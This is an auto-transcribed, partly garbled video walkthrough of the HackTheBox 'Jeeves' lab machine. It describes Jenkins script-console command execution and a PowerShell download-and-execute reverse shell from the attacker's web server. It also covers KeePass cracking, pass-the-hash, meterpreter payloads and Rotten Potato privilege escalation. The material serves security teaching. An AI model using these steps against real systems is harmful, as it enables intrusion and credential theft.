HackTheBox - Jeeves

Key Takeaways

what's going on YouTube this is IPSec and we're doing G's from half the box which is a pretty cool box because well it's got rabbit holes but if you do your numeration correctly you can quickly get out of the rabbit hole before you waste time to find a Jenkins instance that doesn't have authentication which means there's a few ways to get code execution we'll do two different ways and get a shell in the box and once you get a shell in the box there's two ways to go up to root or administrator the first way is the standard Windows server of rotten potato we'll show that at the very end of the video the intended way is to find a key path database once you get the key past database you can crack it and then you find a ntlm hash in it which you can do pass the hash to the administrator user and then get admin that way once your admin though you go into the administrators desktop and there's no root text the file is mm dot txt so doing more enumeration you identify that there's an alternate data stream just like in minion and you can extract root dot txt from that file and then the box is done the rotten potato method will show you how to do that in Metasploit and then whenever I get around to do in the tally video we'll do all that without Metasploit so yeah let's just jump in we're gonna start off with a head map so a map - SC for default scripts as V underrate versions Oh a I'll put all formats put in the end map directory call the files initial then the IP address of G's which is 1010 1063 does take some time so I've already an it just looking at the results we see the at Microsoft I is Internet Information Services version 10 is listening on port 80 we got SMB open port 50,000 is running a jetty webserver and that is about it so IAS 10 this is Windows 10 or 2016 if you did not know that you can just Google like high-acid versions and then you shouldn't come to a page that says like 6.0 is 2003 7 is 2008 75 2008 r2 8.0 2012 and then at 6 more rows if you click the link you'll go to the TechNet page or whatever Microsoft calls this and see all the versions doesn't look like this was updated for Windows 10 but seven eight nine so we go to ten actually the real reason I think Microsoft skip version 9 is because of bad developers just doing some type of regular expression and saying hey if the version begins with nine it's gonna be legacy because that's 95 98 if it begins with anything else then it's like a 2000 error box so where were we oh we have to check port 80 and 5,000 so if we go to 1010 1063 we see an ask geez page if we go to 1010 1063 port 50,000 to see what jetty is nothing so 4 4 before we do any poking let's just set up some enumeration in the background and that will be go Buster so go Buster - you HTP 10-10-10 63 - w4 word list user share word list buster directory list 2 3 medium or do 15 threads and I need to do the help real quick op go Buster Buster that's H how do we save the output is it - OH - oh so this will be patchy dark text and then we will get a new window copy this dude - OH jetty text and we change this to port 50,000 okay so now let's look at this Ask Jeeves thing looking at these links if you look in the bottom left corner of my browser they all go to a pound of hash tags which means they go nowhere so test a search click it and we get an error message however if we did enumeration correctly we know that this error message is probably just a picture because we can't highlight anything but more importantly Microsoft sequel server 2005 kudos to whatever developer can get this running on Windows 2016 we have a date of 2009 and Windows 2016 release date is let's see 2016 go figure I should have guessed that one more Microsoft sequel here a really old asp.net version I don't know if you can like relate asp.net versions to OS I don't think so but we control you we can see it just goes to jeeves dot PNG so let's go back a page and look at the source code and we see that the form action is just going to arrow down to HTML so we know this field is nothing it's just going to direct us to arrow dot HTML every time which is an error message of the form of picture of a really old version of Windows and yeah that's not worth the numerating so let's go back to see if door buster found anything or go buster nothing on apache we have slash Ask Jeeves on jetty so let's go to the ten thousand ten ten ten sixty three or not ten thousand 50 thousand and we see a Jenkins database so first thing I will do is check Jenkins version when this was released because I know Jenkins has a bunch of DC ization vulnerabilities so if changelog see we were to eight seven so search 2.8 dot 7 is it 2.8 7 okay so 2017 October 29th so chances are this is around the time Jeeves got released which means we're probably not looking for a CV and Jenkins because it's by the most up-to-date version looking at red because red means bad we don't only see anything they negate it grew nothing too interesting there nothing too interesting go to the very top of the page because we know Jenkins loved deserialization vulnerabilities we looked the last one 2018 before then so we can start ignoring that it does look like we're already authenticated or something so anonymous access may be allowed because we shouldn't be able to do all of this type of stuff we should just get a login prompt and there's two ways you can code execution I know of on Jenkins one is this bad way of creating a whole new project because I call this the bad way cuz it um it's noisy people can see a new project but I'll show what this does in case you don't have access to the other way I normally do it so here we have like post build actions or build actions and we can execute windows batch command shells if we click that we can type a command here and it executes when you build we're not gonna do that though because I don't like that it I think it's blind and it's it's just disgusting so if we go to let's see manage Jenkins and let's see is it Jenkins CLI or script console script comps and we see it says typin or betray groovy script and executed on the server this sounds very bad it's also giving us a handy tip of using println to see the command output because system gone out we'll go to service standard out which is harder to see so I know a little bit about groovy and a little bit I know is how to execute commands and it's just like foreign languages and foreign languages I know a lot of languages if all you do is want insults in programming languages I know a lot of languages if all you want to do is bad things like execute shell commands so if you didn't know how to execute commands in groovy you could just go to google and say groovy command execution etc but we're just gonna do CMD equals Who am I Who am I is just a simple command that we should have privilege to do then we're also going to do println so we can see the output CMD dot execute and text if we click run should get the output when this finishes and hold on I screwed up there we go we don't want that in quotes because we have a variable if we just did like Who am I in quotes then we didn't have to add this variable let's just open a new window I don't know what it's doing oh I should have copied that I did not my bad CMD equals Who am I print Ln CMD execute text run and we get we are the on Jeeves and Kousuke and I don't know what that word is probably different language of something but anyways we have code execution so the next step with code execution is getting a shell so we googled like nishang github it brings you to a really cool page so I'm gonna do this so make the dub dub dub we'll go in there I have nishang stuff and op PowerShell nishang and we want let's see probably pivot and nope that's not it shells we want shells we have a bunch of PowerShell one-liners Oh PowerShell ways to get shells and I think we did this in minion as well whatever box we need to do ICMP shell but ICMP shell is horrible so we're going to go to PowerShell TCP we don't to do one line if we wanted to paste the PowerShell inside of this we do the one line one but I'm gonna do it invoke expression to my web server so I don't have to worry about that copy this into a folder and again I just don't like changing things in the github pull directories or whatever it is I'd rather just copy it out edit it to my needs and then carry on so we can look at this and we see the example invoke powershell tcp reverse IP address port whatever so easiest way to copy i do is that put it delete the line they can just do p and then put it wherever and the reason why i'm putting this at the bottom is so it auto execute soon as we run it what is my IP address we adopt 30 and will do port 8000 one if we didn't do that we could probably just add a lot that line in this script console after the IE x but I like just IX and get shell so PowerShell IX we have a lot of quotes because this will use a single quote and a double quote let's start something let's do triple quotes and then hello echo oh well rolled and double quotes does this work CMD that did not should be a way to do this that did not work Oh have unbalanced quotes click run and still not cannot find the file specified oh because I have CMD here I'm assuming this is calling like command prompt it's not so we have to so cmd.exe /c let me do echo hello world and there we go that should be what we want so now I don't want to worry about silly quotes I can just do PowerShell IX new object net dot web client download string HTTP 1010 1430 / rev ps1 and single quote and double quote because we want this and double quotes and that should execute so we have to move invoke this to be rev ps1 stir this HTTP server and we have to start a reverse shell and just because I like I might reverse shell on the left I'm gonna do HTTP over here a CD dub-dub-dub and then neck at LV MP 8000 one click run we see it get revved ps1 Rev / ps1 and we want it to get rev dot ps1 click run go ahead and get it's going slow there we go rev dot ps1 connect from unknown and it's loading a shell so if we do Who am I this isn't the fastest show it's going slow for some reason but we are good so the next thing to do would be let's do like power up so oops let's go dub-dub-dub and I'm going to download powers play actually and I always like using the development branch of power sploit just because it has some newer things so if we do get clone - be dev I think that's the branch yep branches dev ok so powersploit recon and let's power up it's a Provost it is so IX new object net web client download string HTTP 1010 1430 and now we want to go to Paris boy Prive esque and then power up ps1 ok we loaded it and we didn't execute it because we don't have any commands at the end of this so if we go to that window less power up what there we go this is just a script and it's not executing anything at the end so we actually have to give it the command or put something at the end I didn't do that because this does have arguments and stuff I may want to do so I just loaded the script and we can see what to do it's like all checks I think so invoke all - all - checks of what we want invoke all checks and maybe it'll run the Box is going slow so could take a while we'll rename this window to show one up will do powersploit has some errors that's fine and then create a new one we'll do n CL v NP 8000 - and go back here good Jenkins we lost our script so give an HTP history we can search with IX and we'll just go to repeater and change CMD powershell new object rev ps1 okay so go back to PowerPoint edit rev ps1 to be Rev to ps1 okay and we'll do this on port 8000 - you don't need that CDW double anymore do it and changed Rev dot ps1 to Rev to click go and we got another show so we can do stuff while Palace boys running oh it finished so now we have a backup shell let's take a look at what Paris boy found privilege se impersonate this is not in master master doesn't go and look at tokens the dev branch does so I see impersonate this means that rotten potato is going to work so we have a professor there that is not the intended Provost but it is a privacy and we'll do that at the end of the video service named Jenkins Stewart name so what is this saying we may be able to modify Jenkins exe but we can't restore it so we have to find a way to reboot the box after doing that so we're not gonna do that because well we won't be able to screw with it it's a modified service final check so what it's saying is there's a service jenkins and we should be able to modify jenkins dot exe and then when the service restarts it starts or executable that we put in unintended path we can cap this power to see what this is so whoops tight on antenna XC and see if there's a password here this is bigger than I expected it public token sense of data deleted so it's probably gonna be nothing interesting here senses it delete it again so nope nothing there c-can we view anything else and administrators we cannot so if we go to Kazuki which is our user see if there's anything here we go to desktop we got the user dot text so if we wanted to we could do like get content user dot text and instead of actually doing this will only get sixteen characters so get content user dot text dot substring zero 16 and there's the first 16 characters of user dot text we see the length is 32 so you know there's more characters after that it's the md5 hash I just want to show it on stream so let's see go to n documents and we have a key path database see eh so what we're going to do is on Zoom I'm going to go back into Jeeves directory make a directory called SMB because we want to copy this file and it's a pain to copy the file we could do a bunch of powershell junk and get the key past database but we could also just do info what is it now crap I am birthing on the name in packet in packet SMB server and we have to give it a share name so the share name is going to be please subscribe and then the path and we'll just do PWD as the path so now we have an SMB server listening on our box with the share please subscribe that anyone can write so we're going to do new PS drive - name follow on Twitter - PS provider file system - root and then we can do 10 10 14 30 which is our IP the share name which is please subscribe and that should be it there we go we have mounted that file system so if we went we could actually CD - please subscribe drive oh no we called it CD follow on Twitter and now if I created a file hip sack - you're awesome and we look at this we have the follow you awesome and it's a zip set so we can copy the ceh dot whatever ok dbx to a local directory if we go here we now have the key past database so there is a key pass to John and then that converts it into a hash that we can crack so we're gonna copy this and we're also going to go because I hate using John I'm gonna do hash cat example hashes and then see what we can do so keepass we have a few formats so KeePass 50,000 c.q pass to 6000 so we have probably this format key pass to AES without key file so 13400 so i'm gonna s h into my box I don't recommend doing any cracking in VMs because it's a CPU intensive thing or GPU intensive and well that doesn't go well so doing the hash cat we can create a new file and hashes called Jeeves dot key pass place the file there dot slash hash cat ashes Jeeves that hash cat I want to do - Adam 13400 I think yep and then the dictionary file I think I put the dicta hopped up word list there we go and we'll start with rokkyo and see how fast this goes and then if we want we can start adding rules to the end of that initially device it's taken quite a while there we go and it already cracked so password is moonshine one for this key past database so let's see go ahead key pass on Cali key pass X and keep as to which I keep SX we don't want that HTTP boxes geez LMN there it is SMB a password moonshine one wrong key our database is corrupt so what should I keep as to open boxes J we go moonshine one there we go so now we have a bunch of hashes my passwords Walmart anonymous we click this we should be able to view it password Michael three two one at Bank of America that is one two three four five d c-- recover administrator and this so we can try this and since we have SMB what we're going to do is let's see we'll call this second shell ssh we no longer need will create user past text and start putting some of these in so we know the only user in the box were like administrator and Kisuke when we went in to see : users so those are the type of ones I want so copy password administrator that Jenkins admin copy that password doesn't have a password set back up stuff question mark copy password what is this it's an anti LM hash that's interesting and I say ntlm right away because this is land man and that's ntlm I know this land man because aad 3b this is a blank land man hash and this is the ntlm it's just stuff you realize when you look at this stuff often nothing else in any of those wait okay yeah so we really only have two things to try administrator and this ntlm hash so well did something undo so if cat user pass and we can just try was it and pack it is there SMB exact w my exec would work as let's do when he XE do a FPS exact yeah when exe - eh let's see - you domain username it is Jenkins slash administrator and then the password I think we could specify after we hit an ax or do cmd.exe we also have to specify the host so 10:10 1063 password paste that in be able to connect that was the pastor I put in so now we'll do cat this again and this time we'll do P th - win exe and we can say and then we can copy this and we get in so we did the pass the hash attack and that is the administrator password and the reason why I try to administrator first is because again when we went into this users directory I knew size akasaki or administrator and well we were Kentucky or kosaki whatever it is so didn't we want to try him because we already had his account so I want an administrator we go in here go to desktop and there's a file hm dot txt and this created a bunch of headache for a lot of people because people kept thinking someone was deleting the root flag eventually I put in this comment of saying the flag is elsewhere looked deeper because it was crazy how many people just got so frustrated if you do a dir it's a slasher to view what is it alternate data streams we can see that this file has root texts and this is also in minion it's just a way to essentially put a file within a file and this is an NTFS attribute so if I copy this file to my Calley box I wouldn't be able to access this if I add something and more interesting is this doesn't change the md5 sum of the file so if I modify the alternate data stream in text it would to whom that text and not change md5 some shots on whatever some you want on the file cuz it's a separate file it's just making a file folder essentially so if we want to view the stream we can do I like PowerShell we could by do streams that exe that's gonna screw up my interpreter isn't it ctrl C let's go up grab this hash and let's just specify in the command line so percent hash is how you specify the password and when exe and the percent comes after the username so CD backslash c d users I really hate not having a real shell not a Mercedes CD what is it Desktop ok so streams dot exe this stream streams that eggsy right here I want to do it away I know I thought there was a file called stream down Axios streams out executable on Windows but PowerShell we can do get content hm text - dream we want the stream of route text and I'm doing substring so you guys can't see the full file just like we did with user dot text and we can see this file so that is it that is uh the box however I promised you a different way to do this box and this is going to be kind of a precursor to the tally video that's gonna come one day hopefully soon I want to do a bunch of like antivirus evasion in that video and stuff it's a good box to do a lot of cool things on which means it's gonna take some time and take some time prepping and me making sure I'm doing things the best way but as a teaser we are now Kurosaki and we want to go and get root so we're gonna use Metasploit and we're gonna do the rotten potato thing because if you remember when I did the powerup it said there was a suspicious token I do Who am I slash Prive we can see all the tokens we have and if we go to let's see foxgloves security rotten potato I want highly recommend reading this post and watching the video but that's not exactly what I wanted to show if we go down to the very bottom abusing token privileges for Windows this is a really good blog post and it has a bunch of interesting tokens and this is just like privileged wind levels for Windows and with each of these will probably able to do a pre vasc so we went to that Who am I and see shutdown privilege not in this list change notify not in the list undock not on the list se impersonate privilege SC and personnel privilege is in this list and this one is just abusable by rotten potato so let's see what do I want to do next let's go back into now we can stay on this share drive let's go opt unicorn because I want to get a meterpreter shell so I'm going to do Python unicorn pie and we're just going to do Windows meterpreter reverse HTTP so we copy this and say we are 1010 1430 it's gonna take a little bit of time not much to create shell code for us and make it in a pretty PowerShell attack file so if we look at PowerShell attack a bunch of obfuscated junk I'm going to copy the whole attack two documents HDB boxes Jeeves I think what user do I run as what's the hearse name is the genes of Jenkins I could have screwed something up earlier no that was with the wind exe and it worked I don't think I did oh sorry for that copy that there and we can do I'm going to copy this unicorn dot or a/c file also in that same directory and then go in I'm gonna move that unicorn Darcy out of it and make a directory msf and move eunuch one there and then we can just do MSF console - I just turn up a Metasploit listener while that goes cool could not connect to server database so this first rescue will start there we go what goes we're gonna go wrapped in potato exe and what do we want get up.get a fossil of sack and we're just going to download this download save the file so now we got the handler running and in this we should have PowerShell under school attack so we're going to rename that to msf dot txt program this process and we can just do IX breaking here we go new object net dot web client dot download string and HTP 1010 1430 PowerShell underscore tack text that should get us a listener I renamed it here's REM 2 msf text go with the Metasploit and meterpreter session 1 opened so we do sessions - i one do a PWD see where we are winner please subscribe directory so let's just do copy run potato there so we can see P downloads rotten potato and we can execute this but before we do let's drop to a shell I wonder if we have a token option in this let's see it's like a new underscore tokens I'll just go to the very top and then we'll slash to search for token job token no steal token nope I don't see any of them let's just go to show Who am i / prove and we have SC impersonate so we can exit with a load incognito and this extension is the thing that just lets us play with tokens and now that I have that lets do help incognito commands list tokens that's what I was looking for if we list tokens - you know tokens available that's G so we don't have any impersonation tokens available yet and I think I kept calling uh I don't know I think I have called something by the wrong term earlier in the video but I can't remember now anywho that'll be all explained better in the tally video whenever that comes for now we need to get the impersonation token and to do that it's really easy execute - CH - F rotten potato exe and now list tokens - you - G impersonation tokens available no don't turn slash administrators so where was before - G yeah fill ten users so now administrators so let's impersonate token built-in administrators this isn't how I thought it would work I screwed something up I think I don't think this is gonna work nope we did so I expected it to say like anti-authority local system somewhere local account authenticated users so let's see who we are who am i and to your xxx system so now users CD administrator and we are the administrator user I'm going to do this one more time because that did not go as smoothly as I wanted so when exit kill meterpreter clear this and do this one more time so go back to Paris Boyd session looks like your thing still hung so thankfully we have I thought we had a second shell that's just n c lv NP 8000 to go back here go got a shell load meterpreter passenger-side to put a load incognito and I'm going to let split the different way let's put this way and lists tokens - you oh yeah we can't do it anymore because I gave the Jenkins process the anti-authority system token this is what I expected to see let's go back up and trace what we did let's see can we that was in this so this is this what I had expect to see as delegation token impersonation token I did a command I think I did not expect let's see yeah that's weird so executed rotten potato and then had done list tokens and we didn't have the impersonation token so what probably happened is this exploit didn't finish running yet when I did this and that's why didn't see anti-authority system and then when I ran - gee that's when the exploit finished and why I could get into built-in administrators okay that makes a little more sense so if we have let's see can we restart Jenkins and then re exploit this and see if it works so show and let's do what is it to restart a service well I think SC query state running will list services SC query there we go then we can probably just search this for junk and we see the service name is Jenkins so we can do powershell restart service Jenkins and that stopped Jenkins and watch this kill the shell access the denied Who am I let's impersonate system so we can restore the service so impersonate token anti-authority system not currently running a system what list tokens Dashiel there tokens available - gee huh that's where the last time we did that we had the administrator token okay well PWD we're in Jenkins so let's upload root no htb documents HTV boxes documents they should be boxes geez and we put an SMB on potato mash bleep I doesn't like that tilde upload okay execute - CH f run potato exc I'm going to give it a few seconds before I list tokens to let the exploit run there we go let's tokens - you and now we can impersonate the token and I don't know why I just did that because I was trying to do the exploit again which I just did let's try one last thing and then we'll finish replacing the executable do we actually have write permission to that so let's see whoops hi ex thanks cute this and we were search a session for invoke all checks so this is what going back to this says that we're able to modify the Jenkins binary then Reese can't restart the service but we should be able to do something so install service binary I actually don't know what that's going to do let us use MSF venom to create a meterpreter so MSF venom - P Windows what is it meterpreter reverse aged PS and then we need host is equal to 10 10 14 30 no port is equal to 4 4 3 - f is exe - OH MSF dot exe and we'll see if this actually works there may be antivirus on the box that's going to make this a little bit of a pain to do an executable file MSF PE 32 we probably want 64-bit so is it Windows x64 meterpreter okay file MSF Exe and let's we copy this into let myself director we can just upload it straight so sessions are I three with tokens - you lewd incognito we're just verifying we're not don't have any admin tokens I wonder what I restarted Jenkins I actually lost that token immediately shall exit what when do I lose that token so PowerShell restart service Jenkins I don't think they actually restarts because I get that error message however the tokens are only good for some such a period of time that's weird well as long as I don't impersonate I should just be not admin so let's go to a CD users CD administrator access denied should be going to administrator slash dot Jenkins I think it was so we're not an admin user let's see if we can modify Jenkins exe so well copy Jenkins dot exe to Jenkins dot Phe big ok so we have write access to this directory Jenkins got back okay so now let's exit and try uploading so upload MSF dot exe into that directory and we have to do double backslashes or we could have done forward slashes okay so CD then we can move MSF exe to Jenkins dot exe move MSF exe check-ins dot exe overwrite yes access is denied so maybe we can't write to it echo tasks to Jenkins dot exe it's being used by another process so we may have to stop medispa stopped jenkins in order to do this so i'm not sure exactly how to exploit it that way sorry guys went down kind of a rabbit hole for no reason but hopefully that was a good learning experience and i'll see you eventually i'm not sure what else to show so take care of guys and see you next week